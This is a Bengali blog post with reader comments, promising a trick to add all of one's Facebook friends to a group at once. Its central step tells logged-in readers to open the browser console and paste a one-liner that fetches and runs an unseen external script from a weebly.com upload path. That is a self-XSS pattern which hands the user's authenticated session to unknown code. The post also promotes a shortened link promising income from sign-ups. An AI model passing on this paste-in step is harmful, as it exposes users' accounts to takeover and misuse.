একসাথে আপনার সব ফ্রেন্ড কে Facebook Group এ add করুন !

আশা করি সবাই ভাল আছেন। আজকে আমার শিখব যে, কিভাবে একসাথে আপনার সব ফ্রেন্ড কে Facebook  Group এ add করবেন। চলুন শিখে নিই :-

ধাপ -১:

প্রথমে আপনার ফেসবুক একাউন্টে লগইন করুন ।

ধাপ -২:

যে Group এ add করতে চান সেই Group টিতে যান (নিছের চিত্রে আমি আমার Group Bd Online Blog এ গেলাম)।

ধাপ -৩:

এবার কিবোর্ড এর (CTRL+SHIFT+K) চাপুন, দেখবেন নিছের মত একটা উইনডো আসবে, সেখানে লাল দাগ চিহ্নিত স্থানে নিছের কোডগুলো পোস্ট (CTRL+V) করে Enter চাপুন।

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.weebly.com/uploads/4/4/7/4/4474196/bappi.js';})();

এখন দেখবেন নিছের মত একটা উইনডো এসেছে, কতজন Friend add হচ্ছে তা সেখানে দেখাবে।

ব্যাস কাজ শেষ।

আজ এই পর্যন্তই।
পোষ্টটি আগে এখানে প্রকাশিত।
আর সময় হলে আমার এই ব্লগ থেকে একটু ঘুরে আসবেন
>>>>>>>>>>>>>>>>>>>>>ধন্যবাদ সবাইকে<<<<<<<<<<<<<<<<<<<<<<
 বুঝতে কোন সমস্যা হলে অবশ্যই কমেন্ট করবেন।
সবার জন্য একটা উপদেশ:
এই লিঙ্কে গিয়ে রেজিস্ট্রেশন করুন, আর income করুন। 

http://goo.gl/SJ6RzM
বাংলাদেশে একটা ভাল উদ্দেগ। আশা করি সবাই আয় করতে পারবে, বিজ্ঞাপন দিতে বিদেশি কোম্পানি কাড়ি কাড়ি টাকা দিতে হবে না, কম খরছে সবাই উপকার পাবে।

Level 0

আমি milonfci। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 12 টি টিউন ও 47 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

আমি ফেনী কম্পিউটার ইনস্টিটিউট এ কম্পিউটার সাইন্স অ্যান্ড টেকনোলজিতে অধ্যয়নরত আছি। আমি আপনাদের দারুন আর মানসম্মত টিউন নিয়মিত উপহার দিতে পারব বলে আশা করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

kaZ hOlE To MonDo HOy Na, Dekhi trY Kori………. 😛

    Level 0

    @sifat kabir: try kore dekhen. na hole comment e jaban.

Ekhane To Invite Dekahche…….tadEr kache To Invitesn jabe 🙂

    Level 0

    @sifat kabir: না । অটো add হয়ে যাবে।

Level 0

ভাই একটা লিস্ট generate হই তে থাকে.আর তো কিছুই হই না।(code list)

    Level 0

    @Saiful: লিস্ট generate শেষ হওয়া পর্যন্ত অপেক্ষা করুন। আপনার সব friend add হয়ে যাবে।

Level 0

ctrl+p তে print হয়, পেস্ট করতে তো ctrl+v.(ctrl +p দিলে print option আসে) check করেন মিয়া।

    Level 0

    @Saiful: ঠিক ভাই আমার ভুল হয়েছে। ভুল ধরিয়ে দেয়ার জন্য আপনাকে ধন্যবাদ।

    Level 0

    @Saiful: আমি update করে দিচ্ছি।

Level 0

ভাই কোড এর লিস্ট generate হয়, friend list তো generate হয় না।কি করবো????

    Level 0

    @Saiful:
    ভাই আপনি চেক করে দেখেন। ঐ গ্রুপে এ আপনার সব ফ্রেন্ড add হয়ে গেছে।

Level 0

হয় নাই। চেক করছি।

    Level 0

    @Saiful: আপনার কোথাও missing হচ্ছে।

Level 0

may be
???

Level 0

Hoina !!!!!!!!!!!!!!!!!!!!
Firefox 24

    Level 0

    @Splash3r: কি সমস্যা ? আপনি একটু খুলে বলেন। তাহলে আমি সমাধান দেয়ার চেষ্টা করব।

hoi na

update script ta dite parben….